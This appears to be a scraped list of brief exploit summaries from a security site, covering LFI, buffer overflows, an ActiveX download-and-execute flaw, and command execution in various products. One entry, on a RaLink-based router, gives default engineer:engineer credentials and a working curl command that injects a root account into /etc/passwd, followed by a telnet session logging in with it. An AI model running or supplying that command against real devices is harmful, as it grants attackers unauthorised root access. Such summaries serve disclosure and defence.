Dataface portal is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with maliciously crafted parameters to the vulnerable server. This can allow an attacker to read sensitive files from the server, such as /etc/passwd.
This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the 'url' property. One of these files it will be stored in a temporary directory and executed.
1ClickUnzip 3.00 is vulnerable to a heap overflow vulnerability when processing specially crafted .ZIP files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.
Without prior authentication, if the 'allowDownload' option is enabled in config.php, meaning that a tarball download is allowed across all the repositories (not uncommon), an attacker can invoke the dl.php script and passing a well formed 'path' argument to execute arbitrary commands against the underlying operating system.
This exploit is for Xitami Web Server 2.5b4. It is a remote buffer overflow exploit which is tested on Windows XP Pro English with Service Pack 3. The exploit is coded by mr.pr0n and the bug was discovered by Krystian Kloskowski (h07). The exploit is executed by setting up a listener and then entering the target's IP address.
The box uses modified version of RaLink SDK. The standard web interface is accessed via HTTP. 1) Web administration interface can be accessed with standard user/password pair admin:admin This can be later changed, but there is another possible access pair - engineer:engineer and it can't be changed via the web interface. 2) Some of the SDK standard scripts are left and their screens in the web interface are just HTML commented. This reveals the /goform/SystemCommand method. Remote add r00t user with password boza $curl --basic -u "engineer:engineer" -d "command=echo -e "r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand $telnet 192.168.100.254 Trying 192.168.100.254... Connected to 192.168.100.254. modacom login: r00t Password: boza BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash) Enter 'help' for a list of built-in commands.
This module exploits a vulnerability in the Golden FTP service. This module uses the PASS command to trigger the overflow.
A buffer overflow vulnerability exists in Easy~Ftp Server v1.7.0.2 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is triggered when a malicious user sends a specially crafted MKD command with an overly long string, which can overwrite the SEH handler and cause a buffer overflow.
This exploit allows an attacker to bypass authentication and flood a Brother HL-5370DW series printer with pages.
This module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The initial approach is first by transferring our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() function as a new thread.
Services By CQR